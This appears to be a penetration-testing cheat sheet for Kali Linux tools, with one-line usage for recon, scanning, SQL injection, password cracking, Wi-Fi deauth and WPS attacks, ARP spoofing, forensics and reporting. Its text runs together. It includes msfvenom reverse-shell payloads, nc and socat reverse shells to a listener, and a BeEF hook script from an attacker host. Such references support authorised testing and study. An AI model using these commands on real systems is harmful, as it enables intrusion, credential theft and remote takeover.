Kali Tools
dnsenum <domain> → basic DNS info (NS, MX, SOA, subdomains)dnsenum -f <wordlist> <domain> → brute-force subdomains with a wordlistdnsenum --dnsserver <dns> <domain> → query using a specific DNS serverdnsenum -o <prefix> <domain> → save results with file prefix
gobuster dir -u <url> -w <wordlist> → find hidden web directoriesgobuster dir -u <url> -w <wordlist> -x .php,.txt → try common extensionsgobuster dns -d <domain> -w <wordlist> → brute-force subdomainsgobuster vhost -u <url> -w <wordlist> → brute-force virtual hosts
nmap -T4 -F <target> → quick scan (common ports)sudo nmap -sS -sV -sC -O -p- <target> → full scan (version, scripts, OS)sudo nmap -sU -p <ports> <target> → UDP scan of chosen portsnmap -oA <prefix> <target> → save results in all formats
recon-ng → start the frameworkworkspaces create <name> → create a workspace for your targetmodules load <module> → load a recon moduleoptions set SOURCE <domain> → set the target for the modulerun → execute the moduleshow hosts → list discovered hostsexport csv <file> → export results
whatweb <url> → quick fingerprint of site techwhatweb -a 3 <url> → more aggressive detectionwhatweb -v <url> -o <file> → verbose output and save to file
whois <domain> → domain registration infowhois <ip> → IP ownership/allocation info
02 - Vulnerability Analysis
sudo lynis audit system → run a full system security auditlynis show tests → list available test categoriessudo lynis update info → update lynis data/plugins
nikto -h http://<target> → basic webserver scan for common issuesnikto -h https://<target> -o nikto.xml -Format xml → save XML reportnikto -h <target> -Tuning 2 → limit tuning category to reduce checks
sudo systemctl status gvm → check GVM/OpenVAS service statussudo gvm-feed-update → update vulnerability feeds (may vary by install)- (Use the web UI at https://localhost:9392) → create target, create task, run scan
wpscan --url http://<target> --enumerate u → enumerate userswpscan --url https://<target> --enumerate p,t --api-token <token> → enumerate plugins & themes with API tokenwpscan --url <target> -o wpscan-report.txt → save report to file
03 - Web Exploitation
burpsuite → launch Burp GUI and configure browser proxy (127.0.0.1:8080)- Use Proxy → intercept requests, send to Repeater to modify and resend
- Use Intruder → automate payloads/fuzzing (Pro has extra features)
commix -u "http://<target>/vuln.php?cmd=test" → test for command injectioncommix -u "<url>" --os-cmd="id" → run a single OS commandcommix --proxy=http://127.0.0.1:8080 → route through Burp for inspection
sqlmap -u "http://<target>/page.php?id=1" --batch → basic automated SQLi testsqlmap -r request.txt --dbs → use Burp request file to enumerate DBssqlmap -u "<url>" --dump -D <db> -T <table> → dump table data
owasp-zap → launch ZAP GUI and configure browser proxy (127.0.0.1:8080)zap.sh -daemon -port 8080 → start ZAP in headless mode (use API)- Use Active Scanner → run automated active tests (authorized targets only)
04 - Password Attacks
cewl <url> -w <file> → crawl site and save wordlistcewl -d 2 -m 5 -c <url> -w <file> → depth 2, min length 5, count & save
hashcat -m <mode> -a 0 hashes.txt rockyou.txt -o cracked.txt → dictionary attackhashcat -m <mode> -a 3 hashes.txt ?l?l?l?l?l?l → brute-force maskhashcat -m <mode> -a 6 hashes.txt rockyou.txt ?d?d → hybrid (wordlist + mask)
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://<host> -t 4 -f → SSH brute-force for single userhydra -L users.txt -P passwords.txt ftp://<host> -t 6 → FTP with userlist & passlisthydra -l admin -P passwords.txt <host> http-form-post "/login.php:username=^USER^&password=^PASS^:F=incorrect" → HTTP form example
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt → wordlist attackjohn --show hashes.txt → display cracked passwordsjohn --incremental hashes.txt → incremental brute-force
medusa -h <host> -U users.txt -P passwords.txt -M ssh -t 8 -f → SSH brute-forcemedusa -h <host> -U users.txt -P passwords.txt -M ftp → FTP brute-force
05 - Wireless Attacks
airmon-ng check kill → stop interfering services before monitor modeairmon-ng start <iface> → enable monitor mode (creates mon0 or wlan0mon)airodump-ng --bssid <BSSID> -c <channel> -w <prefix> <mon_iface> → capture packets/handshakeaireplay-ng --deauth 10 -a <BSSID> -c <client> <mon_iface> → deauth client to force handshakeaircrack-ng -w <wordlist> -b <BSSID> <capture>.cap → crack handshake with wordlist
sudo kismet → launch Kismet server and web UI (http://127.0.0.1:2501)sudo kismet -c wifi:mon0:name=mon0 → start with specific source- Export pcaps via UI or kismet.conf for later analysis
sudo reaver -i mon0 -b <BSSID> -c <channel> -vv → brute-force WPS PINsudo reaver -i mon0 -b <BSSID> -c <channel> -K 1 -vv → try pixie-dust attack (if supported)--mac=<mac> → spoof MAC to avoid rate-limits or blocks
sudo wifite → interactive scan and attack menu for nearby APssudo wifite --kill --wps --crack --dict /path/to/rockyou.txt -i mon0 → non-interactive WPS + handshake capture + cracking--kill → stops NetworkManager/wpa_supplicant while running
06 - Reverse Engineering
edb ./binary → open binary in Edb GUI for visual debuggingedb -p <pid> → attach to running process- Use breakpoints (click) and step (F7/F8) to inspect registers/memory
gdb ./binary → start gdb with binarygdb -p <pid> → attach to running processbreak main / run <args> / info registers / x/32xb $rsp → common workflow
jadx-gui app.apk → open APK in GUI and browse decompiled Javajadx -d out app.apk → decompile APK to folder out/grep -R "KEY" out/ → search decompiled sources for strings
r2 -A ./binary → open and auto-analyze binaryafl → list functionspdf @ sym.main → print disassembly of mainVV → visual mode (interactive disassembly)
beef-xss → start BeEF UI (http://127.0.0.1:3000/ui/panel)- Hook with
<script src="http://<attacker>:3000/hook.js"></script> → inject into vulnerable page
msfconsole → start Metasploit consolesearch <keyword> → find moduleuse exploit/... / set RHOSTS <ip> / exploit → run exploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o shell.exe → Windows reverse shell exemsfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf -o shell.elf → Linux reverse shell ELFmsfvenom -p ... -f c → output C-style shellcode
searchsploit <keyword> → search Exploit-DB offlinesearchsploit -m <id> → copy exploit to current directorysearchsploit -x <id> → open exploit in editor
08 - Sniffing & Spoofing
bettercap -iface <iface> → start Bettercap on an interfacenet.probe on / net.recon on → discover hostsarp.spoof on / net.sniff on → perform ARP MITM and sniff traffic
ettercap -T -M arp:remote /<target1>/ /<target2>/ → ARP MITM between two hostsettercap -G → launch GUI mode- Use plugins like
dns_spoof for DNS hijacking
tcpdump -i eth0 -nn -c 10 → capture 10 packetstcpdump -i eth0 port 80 -A → capture and show HTTP traffictcpdump -i wlan0 -w capture.pcap → save to file for Wireshark
wireshark → launch GUI analyzer- Display filters:
http, ip.addr == <ip>, tcp.port == 21
- Right-click packet → Follow TCP Stream → reconstruct conversation
09 - Maintaining Access
nc -lvnp 4444 → listener on port 4444nc <ip> 4444 -e /bin/bash → reverse shell to listenernc -l -p 1234 < file.txt / nc <ip> 1234 > file.txt → file transfer
socat tcp-connect:<ip>:<port> exec:/bin/bash,pty,stderr,sigint,setsid,sane → reverse shell- Listener:
socat file:\tty`,raw,echo=0 tcp-listen:4444Victim:socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::4444` → stable shell upgrade
socat tcp-listen:8080,reuseaddr,fork tcp:<target>:80 → port forward
ssh user@<ip> → basic loginssh -i id_rsa user@<ip> → login with private keyssh -L 8080:localhost:3306 user@<ip> → local port forwardssh -D 1080 user@<ip> → dynamic SOCKS proxy
10 - Digital Forensics
autopsy → launch Autopsy server and open browser UI (http://127.0.0.1:9999)- Create case -> Add data source (image.dd) -> run ingest modules (timeline, keyword, file type)
- Export HTML/PDF report from GUI
binwalk firmware.bin → scan for embedded files and signaturesbinwalk -e firmware.bin → auto-extract embedded files to _firmware.bin.extracted/grep -R "flag{" _firmware.bin.extracted/ → search extracted content for flags
mmls image.dd → show partition layout and offsetsfls -r -m / image.dd → list files (including deleted)icat image.dd <inode> > recovered_file → extract file by inodetsk_recover image.dd output_dir/ → recover many files
vol.py -f memory.dmp --profile=<profile> pslist → (Vol2) list processesvol -f memory.raw linux.pslist → (Vol3) list processesvol -f memory.raw linux.lsof / netscan → list connections and open filesstrings memory.raw | grep -i password → quick memory string search
11 - Reporting
docker run --rm -p 3000:3000 dradis/dradis-ce → quick Dradis server (Docker)- Use web UI to create project, import Nmap/Nessus/Burp outputs, add findings, export HTML/PDF
docker-compose up -d → start Faraday server/client stack (depends on your compose file)faraday-import nmap -f nmap.xml -w myworkspace → import Nmap into workspace (CLI helper name may vary)- Use web UI to tag findings, add notes, and export reports
- Launch GUI -> New Graph -> add seed entities (domain/email/IP) -> run transforms
- Add API keys (Shodan, VirusTotal) in settings to enable advanced transforms
- Export graph -> PNG/CSV for reporting
12 - Other
exiftool <file> → show metadata for images/docsexiftool -a -u -g1 <file> → show all tags including unknown/custom tagsexiftool -csv -all <file> → export metadata as CSV
steghide info <file> → check if file contains embedded datasteghide extract -sf <file> -xf <out> → extract embedded file (prompts for passphrase)steghide embed -cf <cover> -ef <secret> -sf <out> → embed secret into cover (prompts for passphrase)
stegseek <stego-file> <wordlist> <output> → brute-force stego passphrase with wordlist- Use targeted wordlists (Cewl output or rockyou) for better success
strings <file> → print printable strings (min length 4)strings -n 6 <file> → set min length to 6 to reduce noisestrings -t x <file> | grep -i password → show hex offsets and search for "password"